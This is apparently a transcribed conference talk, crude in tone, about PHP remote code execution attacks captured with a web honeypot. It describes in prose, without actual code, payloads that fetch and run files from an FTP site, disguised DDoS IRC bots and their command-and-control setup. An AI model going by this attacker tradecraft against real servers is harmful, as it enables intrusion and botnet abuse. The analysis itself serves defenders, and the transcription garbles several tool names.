 I have 30 slides to go through, like he does. But they're not going to be anywhere near as interesting. So that's me, the important slide about me. I'm going to be talking about PHP remote code execution, basically that, which I'm sure some of you guys will know about, which makes me excited, because who doesn't love remote code execution? Just me. Wow. Everyone loves except for the good guys. Except for the bad guys who loves that remote code execution. I did these slides last night and this morning after drinking a bit too much. So if I go a bit off-kilter, you know why. But I'm mostly interested in PHP remote code execution. And it looks kind of like that, which you can't see, because it's really small text on a shitty background. So let's make that a little bit better. That's what one request looks like, and you should recognize that. Anyone recognize that? Seriously, I expect at least 10 hands. Otherwise, you're all going to buy me beer, except for you, because you always fucking argue with me. OK, that's an Apache log. You can see the post, the blah, blah, blah, HTTP 1.1, 404, blah, blah, blah. That's what you see in your logs, which is great, because that big blob of text there is encoded text. So we can take that into something like BIRP decoder and decode it. And that really small text that none of you can see is the part that was posted to the Apache logs. It's not really useful to us, so we can't really tell what the stuff is doing, but we know that something bad is going on because, yeah. So what we do is we look back and we see it's a post, so we're not going to see anything in the Apache logs. So that's really not much use to us. So how do we get something useful back? Well, you go to something like Glastoff, which is a really nice web proxy, a web honeypot that a friend of mine wrote. And yes, you have to run on port 80, blah, blah, blah. But what it does is it will say, I'm vulnerable to this. I'm vulnerable to that. And just take all that data in. So no matter what you throw at it, you'll get stuff. So you can actually check what is contained in that post data. And I wrote some really shitty code to look at the databases that Glastoff writes, so you can actually then pull out useful data, because I'm great and I've got a good bum. And what you do get in the post data is something that looks like that. So that's what you'll see in the actual post data. So first line, killpl, killphp, go into the temp, download some really great file from an FTP site, and then run that FTP site. Who thinks this is a good idea on a web server? Remote code execution, yeah, yeah. And this is what they download. Again, small text, black background, terrible. This is a pulled DDoS script. We can see that it's going to mask itself as user local Apache bin, HTTBD. And we've got the command and control server that it connects back to, along with the RSE channel. So you can actually go in there and be like, hi, I want to control your RSE thing. And then they DDoS you, and then your boss shouts at you. Here's another one. This was a scraper script. I'm not entirely sure what a scraper script does, but again, the nickname of the bot, thug life is the authentication. And then this is obviously R&D, because the channel is testing, so he's not really to go into QA yet. But we've got, again, CNC server, blah, blah, blah. Great stuff. This one was fun. I actually had a great time at CCC last year with the guy. So there were these four, five files that got downloaded. We've got some 386 normal Intel code. We've got some MIPS stuff. We've got some ARM stuff. All kind of doing the same thing. And I'm going to go in a bit tangent here, because it made me really hot at the time. I looked at it, and I was like, this has got to be packed or something. It wasn't. I gave it to this guy, and I was like, hey, look at this. It's malware. It's fresh. It's interesting. He's like, mm, either. It's just not packed. It's just really weird encoding, blah, blah, blah. And it was really cool stuff. I then passed out from drinking too much, and I lost my chain of thought. But the cool thing for this is that the detection ratio for those files was about 1 out of 47, 2 out of 47. I'm not entirely sure what they do. I know they're malicious. I just haven't bothered to fire up an ARM or a MIPS machine to run it, because I like to drink beer and sit in the sun and ride bikes. I'm a bad geek. But this is all great for bad guys. They make bad guys really happy, and good guys like us are really sad. So what can you do to save yourself? Patch your shit. Don't run PHP, preferably, because PHP is shit. Thank you. Boobies. I have samples if anyone wants samples to play with. You know the man in the green.